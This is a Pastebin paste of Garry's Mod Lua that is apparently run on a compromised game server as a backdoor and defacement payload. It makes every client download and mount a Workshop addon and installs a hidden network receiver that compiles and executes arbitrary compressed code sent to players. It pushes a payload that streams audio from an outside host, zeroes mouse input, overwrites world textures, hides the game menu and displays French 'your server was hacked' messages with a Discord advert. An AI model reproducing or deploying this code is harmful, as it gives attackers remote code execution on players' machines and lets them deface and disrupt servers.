Advertisement
Guest User

Untitled

a guest
Jun 26th, 2019
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.45 KB | None | 0 0
  1. GizehSSV = GizehSSV or {}
  2. GizehSSV.Wait1 = GizehSSV.Wait1 or !!1
  3. GizehSSVLogo = GizehSSVLogo or nil
  4. GizehSSV.Enabled = GizehSSV.Enabled or !!1
  5. timer.Create("qqyptebobvnq", 1.5, 0, function()
  6. local time = tonumber(0)
  7. local Message = {
  8. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  9. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  10. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  11. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  12. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  13. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  14. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  15. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  16. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  17. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  18. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  19. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  20. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  21. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  22. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  23. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  24. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  25. }
  26. for _, line in pairs(Message) do
  27. time = time + tonumber(0.1)
  28. timer.Simple(time,function()
  29. if not GizehSSV.Enabled then return end
  30. chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ),line)
  31. end)
  32. end
  33. end)
  34.  
  35. timer.Simple(1, function()
  36. if not GizehSSV.Enabled then return end
  37. local text = "Le Guiser Menu sais trop bien les reille"
  38. local str = '' text = string.Trim(text) text = string.Explode(' ', text) if text == {} then return end for k,v in pairs(text) do str = str .. v .. '+' end sound.PlayURL('http://translate.google.com/translate_tts?ie=UTF-8&client=tw-ob&q='..str..'&tl=fr','mono',function(chan, num, str)end)
  39. end)
  40.  
  41. for k, v in pairs(player.GetAll()) do
  42. v:SendLua("steamworks.FileInfo(1781610581,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  43. end
  44.  
  45. for k, v in pairs( player.GetAll() ) do
  46. if ( v:Alive() ) then
  47. v:GodEnable()
  48. else
  49. v:Spawn()
  50. timer.Simple( 5, function()
  51. v:GodEnable()
  52. end)
  53. end
  54. end
  55.  
  56.  
  57. game.AddParticles( "particles/comite.pcf" )
  58. PrecacheParticleSystem("enigma")
  59.  
  60. local function rdm_str(len)
  61. if !len or len <= 0 then return '' end
  62. return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  63. end
  64.  
  65. local net_string = rdm_str(25)
  66.  
  67. util.AddNetworkString(net_string)
  68. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  69. hook.Add("PlayerInitialSpawn", "ifyouseethisdontpanicitsme",function(ply)
  70. if !ply:IsBot() then
  71. ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  72. end
  73. end)
  74.  
  75. local function SendToClient(code)
  76. local data = util.Compress(code)
  77. local len = #data
  78. net.Start(net_string)
  79. net.WriteUInt(len, 16)
  80. net.WriteData(data, len)
  81. net.Broadcast()
  82. end
  83.  
  84. timer.Simple( 17, function()
  85. SendToClient([====[
  86. local t = "https://discord.gg/uXXNfmv"
  87. if t:len() > 0 then
  88. surface.CreateFont("\xFF\xFF\xFF", {
  89. font = "Impact",
  90. size = 999
  91. })
  92.  
  93. for i = 1, 10 do
  94. ParticleEffectAttach("enigma",PATTACH_ABSORIGIN_FOLLOW,LocalPlayer(),0)
  95. end
  96.  
  97. local mat = Matrix()
  98. hook.Add("HUDPaint","\xFFmlg_text\xFF", function()
  99. surface.SetFont("\xFF\xFF\xFF")
  100. local x = ScrW() / 2 - (surface.GetTextSize(t)/2) + math.cos(CurTime()*3) * 40
  101. local y = 100 + math.sin(CurTime()*2) * 40
  102. local pos = Vector(x,y,0)
  103. mat:SetAngles(Angle(0,math.sin(CurTime()/1.2)*10,0))
  104. mat:SetTranslation(pos)
  105. surface.SetTextPos(0,0)
  106. cam.PushModelMatrix(mat)
  107. for i=#t, 1, -1 do
  108. surface.SetTextColor( HSVToColor((CurTime()*200+i*7)%360,1,1) )
  109. surface.DrawText(t[ #t - i + 1 ])
  110. end
  111. cam.PopModelMatrix()
  112. end)
  113. else
  114. hook.Remove("HUDPaint","\xFFmlg_text\xFF")
  115. end
  116.  
  117. local chair = ClientsideModel("models/props_c17/chair02a.mdl")
  118. chair:SetNoDraw(true)
  119. local data = {}
  120. local function genChair(id)
  121. local pos = LocalPlayer():GetPos()
  122. data[id] = { Vector(math.random(pos.x-1000,pos.x+1000),math.random(pos.y-1000,pos.y+1000),pos.z + math.random(800,1000) ), math.random(10, 70) }
  123. end
  124. for i=1, 70 do
  125. genChair(i)
  126. end
  127. hook.Add("PostDrawOpaqueRenderables","\xFFitsrainingchairs\xFF",function()
  128. local z = LocalPlayer():GetPos().z
  129. for i=1, #data do
  130. chair:SetPos(data[i][1])
  131. chair:SetupBones()
  132. chair:DrawModel()
  133. data[i][1].z = data[i][1].z - data[i][2] / 20
  134. if data[i][1].z <= z then
  135. genChair(i)
  136. end
  137. end
  138. end)
  139.  
  140. local gfx = {}
  141.  
  142. local messages = {
  143. "Votre serveur a était hacké par le comité d'éclateur de serveur",
  144. "la ref#8219 NeRoW.#7280 Esma Network lvl 998#6877",
  145. "Discord: https://discord.gg/uXXNfmv",
  146. "Votre serveur va plutôt bien marcher",
  147. "Maintenant il nous appartient.",
  148. "Vous pouvez maintenant pleurer.",
  149. "#Owned #Hacked #Tonserveurcdlamerde"
  150. }
  151.  
  152.  
  153. hook.Add("HUDPaint", "FUCKIT_G",function()
  154. for k,v in pairs(gfx) do
  155. v()
  156. end
  157. end)
  158.  
  159. local message = "Ne redemmare pas ton server, cela ne sert a rien"
  160. local function SlowType(msg,interval,callback)
  161. callback = callback or function()end
  162. message = ""
  163. for i=1,#msg do
  164. timer.Simple(interval * i,function()
  165. message = message .. msg[i]
  166. end)
  167. end
  168. timer.Simple(#msg*interval,callback)
  169. end
  170. local function GetRandomSpot()
  171. local ppos = LocalPlayer():GetPos()
  172. return Vector(ppos.x + math.random(-500, 500),ppos.y + math.random(-500, 500),ppos.z + math.random(-10, 10))
  173. end
  174. surface.CreateFont("PWN",{bold=true,size=40})
  175. SOUNDSTART_CTP = false
  176. sound.PlayURL("https://testfdh.000webhostapp.com/larefclemeilleur.mp3","no block",function(s)
  177. if not s then return end
  178. if SOUNDSTART_CTP then s:Stop() return end
  179. SOUNDSTART_CTP = true
  180.  
  181.  
  182. local ragtbl = {}
  183. for i=1,20 do
  184. ragtbl[i] = ClientsideRagdoll( "models/player/gman_high.mdl" )
  185. ragtbl[i]:SetNoDraw( false )
  186. ragtbl[i]:DrawShadow( true )
  187. end
  188.  
  189.  
  190. timer.Create("ChangeRagdolesSpotsAW", 1, 0, function()
  191. for k,v in pairs(ragtbl) do
  192. v:SetPos(GetRandomSpot())
  193. end
  194. end)
  195.  
  196.  
  197. hook.Add("AdjustMouseSensitivity","MDR",function()
  198. return 0
  199. end)
  200. gfx["CoolEffect"] = function()
  201. local tbl = {}
  202. s:FFT(tbl,FFT_2048)
  203.  
  204. local fal = 0
  205. for i=4,6 do
  206. fal = fal + tbl[i]
  207. end
  208.  
  209. if fal > 0.8 then
  210. local ca = Color(math.random(0,255),math.random(0,255),math.random(0,255), 150)
  211. gfx["ColorChange"] = function()
  212. draw.RoundedBoxEx(250, 0, 0, ScrW(),ScrH(),ca)
  213. end
  214. util.ScreenShake(LocalPlayer():GetPos(),20,20,0.5,20)
  215. local mats = Entity(0):GetMaterials()
  216. for k,v in pairs(mats) do
  217. local r,g,b = ColorRand().r-50, ColorRand().g-50, ColorRand().b-50
  218. Material(v):SetVector("$color", Vector(r,g,b))
  219. Material(v):SetTexture( "$basetexture", "_rt_fullframefb" )
  220. end
  221. end
  222. for k,v in pairs(tbl) do
  223. local col = HSVToColor(k * 1 % 360,1,1)
  224. draw.RoundedBoxEx(0,0,k * 10, (v*10000), 10,col)
  225. draw.RoundedBoxEx(0,ScrW() - (v*10000),k * 10, (v*10000), 10,col)
  226. end
  227. end
  228.  
  229. timer.Simple(29, function()
  230.  
  231. hook.Add("GetMotionBlurValues", "YASS",function(a,b,c,d)
  232. return a,b,c+140,d
  233. end)
  234.  
  235.  
  236. end)
  237.  
  238. local cc = 1
  239. local omgs = {}
  240. timer.Create("MVSPOS", 0.04, 0, function()
  241. for k,v in pairs(omgs) do
  242. if omgs[ k ].n <= 0 then omgs[ k ] = nil continue end
  243. omgs[ k ] = {text = omgs[ k ].text, n = omgs[ k ].n - 1}
  244. end
  245. end)
  246. local isPounding = false
  247.  
  248. timer.Create("NEXTMSG", 6, #messages, function()
  249. if cc > #messages then
  250. isPounding = true
  251. return
  252. end
  253. table.insert(omgs, {text = messages[ cc ],n = ScrH()})
  254. cc = cc + 1
  255. end)
  256.  
  257. gfx["MessageC"] = function()
  258. if isPounding and (#messages <= 0) then
  259. draw.SimpleText("RT ton server <3", "PWN", ScrW() / 2, ScrH() / 2,Color(200,0,0),1,1)
  260. end
  261. for k,v in pairs(omgs) do
  262. draw.SimpleText(omgs[ k ].text, "PWN", ScrW() / 2, omgs[ k ].n,Color(0,0,0),1,1)
  263. end
  264. end
  265. end)
  266. concommand.Add("canard", function()
  267. hook.Remove("GetMotionBlurValues", "YASS")
  268. hook.Remove("AdjustMouseSensitivity","MDR")
  269. hook.Remove("HUDPaint", "FUCKIT_G")
  270. end)
  271.  
  272. game.AddParticles( "particles/comite.pcf" )
  273. PrecacheParticleSystem("enigma")
  274. hook.Add("Think","iuefheqefq",function() gui.HideGameUI() end)
  275. ]====])
  276.  
  277. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement